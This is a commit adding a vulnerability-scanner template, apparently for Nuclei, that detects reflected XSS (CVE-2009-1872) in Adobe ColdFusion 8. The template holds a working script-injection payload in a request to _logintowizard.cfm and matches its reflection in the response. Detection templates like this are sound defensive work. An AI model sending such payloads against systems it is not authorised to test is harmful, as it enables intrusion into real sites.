Create CVE-2009-1872.yaml

2021-07-21 11:35:30 +05:30 · 2021-07-21 11:35:30 +05:30 · d72b6df0bf
parent 9cadadca8e
commit d72b6df0bf
1 changed files with 32 additions and 0 deletions
--- a/cves/2009/CVE-2009-1872.yaml
+++ b/cves/2009/CVE-2009-1872.yaml
@ -0,0 +1,32 @@
+id: CVE-2009-1872
+
+info:
+  name: Adobe Coldfusion 8 linked XSS vulnerabilies
+  author: princechaddha
+  severity: medium
+  description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
+  reference: |
+    - https://www.securityfocus.com/archive/1/505803/100/0/threaded
+    - https://www.tenable.com/cve/CVE-2009-1872
+  tags: cve,cve2009,adobe,xss,coldfusion
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?></script><script>alert(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200